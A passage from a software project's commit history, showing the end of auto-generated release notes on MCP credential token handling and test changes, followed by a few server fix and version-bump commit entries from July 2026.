* Improved consistency when issuing and validating MCP credential tokens
by using a shared token prefix across issuance and parsing.
* Preserved correct recognition of standard JWT-based authentication
tokens.

* **Tests**
* Updated MCP credentials coverage to validate behavior through the HTTP
API response (instead of direct controller invocation).
* Adjusted workspace quota e2e setup to derive restricted limits via
entitlements before reconciling quota state.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-07-15 12:29:50 +08:00
DarkSky c61cc6a86f fix(server): missing query cache v0.27.0 2026-07-15 04:38:49 +08:00
DarkSky 3bbc890bcb fix: migration ownership v0.27.0-beta.7 2026-07-15 03:14:41 +08:00
DarkSky e145d87d56 feat(server): cleanup legacy compatibility (#15239) 2026-07-15 03:01:51 +08:00
DarkSky 00d4ab10a1 chore: bump version 2026-07-14 19:43:42 +08:00